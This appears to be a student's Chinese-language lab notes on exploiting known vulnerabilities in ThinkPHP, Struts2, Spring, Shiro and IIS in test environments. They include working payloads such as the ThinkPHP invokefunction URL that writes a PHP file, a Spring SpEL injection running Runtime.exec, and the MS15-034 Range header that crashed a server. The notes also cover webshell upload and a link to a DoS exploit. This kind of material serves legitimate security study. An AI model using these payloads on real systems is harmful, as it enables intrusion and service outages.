ThinkPHP
首先我们打开一个环境
然后进行远程命令执行代码
然后进行远程代码执行
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
在网页中输出phpinfo
getshell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"<?php%20phpinfo();?>"%20>>1.php
然后我们访问创建的php文件
STRUTS2
S2-057远程执行代码漏洞
首先进入环境访问靶机地址
在url后输入${(123+123)}/actionChain1.action刷新后会出现数字
然后将出现的数字里的内容payload修改为编码后的内容
首先要进行抓包
然后再进行修改出现root就可以
Spring
Spring Data Rest 远程命令执行命令(CVE-2017-8046)
首先打开环境
然后访问customers/1
然后进行抓包使⽤PATCH请求来修改
数据包请求发送完成后,进入docker看是否执行命令
spring 代码执行(CVE-2018-1273)
首先打开环境
有这个叶子logo就证明正确
然后进入用户登陆界面
然后填写注册信息抓包
然后发送到重放器中修改username
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/lkj")]=&password=&repeatedPassword=
进入终端查看我们可以看到执行成功
docker exec -it b10ecde567a2 /bin/bash
shiro
Shiro rememberMe反序列化漏洞(Shiro-550)
首先进入环境
抓包确认是否搭建shiro框架
然后使用漏洞利用工具进行爆破漏洞
然后命令执行whoami
中间件
IIS
IIS6.x篇
使用windows server 2003打开IIS管理器
然后打开网站属性进行设置 一定要打开写入权限
然后使用bp对虚拟机IP进行抓包查看options支持的协议
然后用PUT上传文档
返回IIS网站文档查看发现新增文档
使⽤MOVE命令将其更名为脚本⽂档后缀
然后查看修改后的asp文件
如果你写入的asp文件是一句话木马就可以使用工具进行连接
IIS RCE-CVE-2017-7269
首先打开IIS管理器
然后使用kali进行监听
然后需要下载IISx6文件然后放到kali中
然后在文件夹中打开终端进行读取 文件后的第一个IP是2003的IP地址 第二个是kali的IP地址
稍等片刻之后就会监听成功
IIS 7x篇
HTTP.SYS远程代码执行(MS15-034) MS-->Microsoft 2015 -034
首先需要使用Windows server 2012
然后访问它的网站进行抓包
抓包之后修改请求头 添加Range: bytes=0-18446744073709551615
显示416证明存在远程执行代码漏洞
然后需要下载一个文件https://github.com/davidjura/MS15-034-lS-Active-DoS-Exploit-PoC
然后在根目录下使用python打开
上传的图片是虚拟机网站根目录下的图片
运行完成发现虚拟机已经蓝屏